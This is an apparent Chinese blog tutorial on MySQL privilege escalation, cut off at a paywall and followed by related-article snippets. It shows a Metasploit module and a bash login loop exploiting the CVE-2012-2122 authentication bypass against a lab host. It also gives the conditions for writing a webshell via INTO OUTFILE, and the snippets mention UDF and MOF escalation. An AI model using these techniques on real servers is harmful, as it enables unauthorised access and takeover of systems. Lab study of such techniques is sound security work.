MySQL提权总结(建议收藏)

最新推荐文章于 2024-05-29 14:48:53 发布
最新推荐文章于 2024-05-29 14:48:53 发布
阅读量717 收藏 7
点赞数
分类专栏: 网络安全 文章标签: mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xj28555/article/details/120176124
版权
本文详述了MySQL数据库的提权方法,包括利用CVE-2012-2122进行密码绕过,通过Webshell权限利用into outfile写shell,服务器权限提升中的UDF、动态链接库、启动项提权以及MOF提权等技术。文章还介绍了不同提权场景下的限制和应对策略,如MySQL版本和secure_file_priv权限的影响。
摘要由CSDN通过智能技术生成

原文地址:https://www.cnblogs.com/sfsec/p/15241860.html

前言

数据库权限

在平常的渗透提权中,我们通常可以在一些特殊情况下得到数据库的用户名和密码(最高权限root),如下:

MySQL 3306 端口弱口令爆破
sqlmap 注入的 --sql-shell 模式
网站的数据库配置文件中拿到明文密码信息
CVE-2012-2122 等这类漏洞直接拿下 MySQL 权限

口令爆破、sqlmap的--sql-shell模式和数据库配置文件中拿明文密码已经老生常谈了,这里主要演示一下CVE-2012-2122

CVE-2012-2122

当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。

#受影响版本

MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.

MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

在vunlub中启动CVE-2012-2122环境

 环境启动后用docker ps查看进程

 可以看到启动了一个Mysql服务(版本:5.5.23),监听端口为3306端口,默认的root用户的密码为123456

我们可以使用mysql客户端进行远程连接数据库

 连接测试就证明我们的环境正常搭建。然后就是漏洞利用了,正常模拟攻击者,我们是没有密码,不知道root的密码为123456的,这个时候我们就可以利用CVE-2012-2122来进行身份绕过

msf可以导出hash值

msf6 > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf6 > set rhosts 192.168.178.128
msf6 > run

或者直接bash输入

复制代码

root@root:~/桌面# for i in `seq 1 1000`; do mysql -u root --password=bad -h 192.168.178.128 2>/dev/null; done
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 854
Server version: 5.5.23 Source distribution

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]>

复制代码

MySQL提权

Webshell权限

into oufile 写 shell

into oufile 写 shell要满足如下条件才可以写入

1、知道网站物理路径
2、高权限数据库用户
3、load_file() 开启 即 secure_file_priv 无限制
4、网站路径有写入权限

 数据库查看是否有secure_file_priv限制

复制代码

mysql> show global variables like '%secure_file_priv%';
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv | NULL  |
+------------------+-------+

复制代码

Value 说明
NULL 不允许导入或导出
/ 只允许在 / 目录导入导出
不限制目录

在 MySQL 5.5 之前 secure_file_priv 默认是空,这个情况下可以向任意绝对路径写文件

在 MySQL 5.5之后 secure_file_priv 默认是 NULL,这个情况下不可以写文件

利用phpmyadmin来into outfile

首先在存在phpmyadmin时,我们可以试试弱口令,root、root来进行登录phpmyadmin后台。登录进去后我们获取网站的绝对路径来进行写shell

在phpmyadmin中,我们可以利用log变量来猜测网站的绝对路径

最低0.47元/天 解锁文章
「已注销」
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql提权原理_防范Mysql利用触发器权限漏洞提权原理
weixin_28901327的博客
02-08 213
原理分析:1.Mysql5之后支持触发器,并且在创建触发器后会自动在/var/lib/mysql目录下生成TRG以及TRN文件(Linux下)。例如,创建如下触发器:在/var/lib/mysql目录下回生成t.TRG以及t_trigger.TRN文件,内容如下可以看到t.TRG文件中通过DEFINER来将触发器“绑定”到该触发器的创建用户上,并在执行时拥有该用户的权限。2.利用mysql用户的f...
ftpclient判断目录是否存在_微信小程序使用自定义目录进行下载、保存案例
weixin_39610488的博客
11-28 661
文章:王栋(北京中心)排版:suny场景描述最近项目中有一个需要把网络文件下载下来保存到本地,然后对下载的文件进行读取,待文件不再使用后把文件进行删除的需求。当然也类似的需求还有很多,比如把小程序中的临时图片/文件永久保存下来等等,这些都是对文件操作的典型场景。常见问题在以上场景的实现过程中可能会遇到各式各样的问题,以下是比较常见的几个:不清楚文件应该保存到哪个目录下。fail perm...
mysql提权原理_mysql udf提权原理和提权案例分析 udf提权木马下载
weixin_42509914的博客
02-01 152
本文将详细陈说udf提权的道理及详细方式 您可以应用上里供给的langouster_udf.dll 专用网马(php)或应用 php spidershell最新版(已来后门)--极度壮大年夜的PHP大年夜马里里的udf提权功能http://www.linuxso.com/a/linuxdownload/soft/243.html上传udf.php到方针站点拜候上里是udf提权马的界里进进之后....
数据库Mysql提权
最新发布
白帽黑客鹏哥的博客
05-29 1073
UDF(user defined function)⽤户⾃定义函数,是 mysql 的⼀个拓展接⼝。⽤户可以通过⾃定义函数实现在mysql中⽆法⽅便实现的功能,其添加的新函数都可以在 sql 语句中调⽤,就像调⽤本机函数⼀样。 先前条件关于mysql的密码,可以通过假设的网站的配置文件获取,如login.php、config.inc.php等文件获取在默认情况下,mysql只允许本地登录,我们知道可以通过navicat去连接数据库(在知道帐号密码的情况下),但是如果只允许本地登录的情况下,即使知道账号密码的
MySQL提权
09-27 108
一、利用mof提权 前段时间国外Kingcope大牛发布了mysql远程提权0day(MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day),剑心牛对MOF利用进行了分析,如下: Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件: 方法 1:...
mysql提权
weixin_33949359的博客
04-08 309
Namp 扫描ip端口 Cms 探测 wpscan kali 工具 Wpscan 扫描出来用户名。用用户名登录ssh 然后利用mysql UDF提权。 1.gcc-g-craptor_udf.c 编译一下下载的c文件 2.gcc-g-shared-Wl,-soname,raptor_udf.so-oraptor_udf.soraptor_udf.o-lc 3.登录...
Linux利用UDF库实现Mysql提权
09-10
本篇将详细介绍如何利用UDF库来实现MySQL提权操作。 首先,提权通常涉及到获取更高的系统权限,而在MySQL中,通过UDF库可以执行系统级别的命令,从而可能达到提升权限的目的。要实现这一过程,我们需要满足以下...
Mysql 权限提权实例教程.doc
01-03
Mysql权限提取实例教程, 利用mysql提权的前提就是,服务器安装了mysql,mysql的服务没有降权,(降权也可以提,没降权的话就最好了),是默认安装以系统权限继承的(system权限). 并且获得了root的账号密码
mysql提权工具
04-24
mysql自动提权工具,。。。。。。。。。。。。。。。。。。。。。。。
必备神器->MYSQL高版本提权工具-V 2011
01-19
必备神器->MYSQL高版本提权工具-V 2011
mysql udf提权文件
02-01
mysql udf提权文件mysql udf提权文件
暗月mysql全版本通杀提权
06-21
暗月mysql全版本通杀提权
权限提升之Mysql提权-漏洞银行大咖面对面17
07-31
权限提升之Mysql提权-漏洞银行大咖面对面17-指剑碎星河大咖
MYSQL高版本低版本UDF提权工具
06-20
MYSQL高版本低版本UDF提权工具 很好用的UDF提权使用 有两个版本
CentOS 7.5 64下编译好的lib_mysqludf_sys.so
10-12
CentOS 7.5 64位下编译好的lib_mysqludf_sys.so,源文件在https://download.csdn.net/download/shaynerain/10715798,我博客 中有介绍怎么用
mysql 提权_mysql提权
weixin_32287177的博客
01-18 217
mysql提权原理就是让mysql能够执行系统命令,而对与mysql提权主要分为两种:MOF提权和UDF提权第一种:参考文献:https://www.cnblogs.com/zhuyp1015/p/3561470.htmlhttps://www.cnblogs.com/mmx8861/p/9062363.htmlhttps://www.cnblogs.com/ghc666/p/8609067....
提权 --Mysql提权方式总结
Kevin's Blog
05-02 647
一、适用场景 二、UDF提权 2.1 udf简介   UDF(User Defined Functions,用户自定义函数)用户可以添加新函数对MYSQL的功能进行补充。 2.2 注意点 官网对UDF安全项说明:为了防止滥用用户定义的函数: Mysql版本<5.1之前 Mysql版本>=5.1之后,UDF库文件必须放入服务器的插件目录中(~/lib/plugin目录下,该目录由plu...
mysql提权拿服务器,Linux利用UDF库实现Mysql提权
weixin_35834213的博客
03-18 127
环境:os:linux(bt5)database:mysql简述:通过自定义库函数来实现执行任意的程序,这里只在linux下测试通过,具体到windows,所用的dll自然不同。要求:在mysql库下必须有func表,并且在‑‑skip‑grant‑tables开启的情况下,UDF会被禁止;过程: 得到插件库路径 找对应操作系统的udf库文件 利用udf库文件加载函数并执行命令1,得到插件库路径?...
mysql两种提权方式
mohanhan
06-24 2568
mysql两种提权方式Mysql_UDF提权提权要求提权方法Mysql mof提权提权要求提权方法一般方式msf自带提权模块Mysql反弹端口连接提权 Mysql_UDF提权 提权要求 1.目标系统是Windows(Win2000,XP,Win2003); 2.如果mysql版本大于5.1,udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下 注: 该目录默认是不存在的,这就需要我们使用webshell找到MYSQL的安装目录,并在安装目录下创建lib\plugin文件夹,然后将ud
mysql udf 提权
03-06
3. 你需要知道目标MySQL服务器的版本和配置,以确保你选择的提权方法适用于该版本和配置。 请注意,提权是一种潜在的安全风险行为,应该谨慎使用,并且仅在合法授权的情况下进行。滥用提权功能可能导致系统被攻击或...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值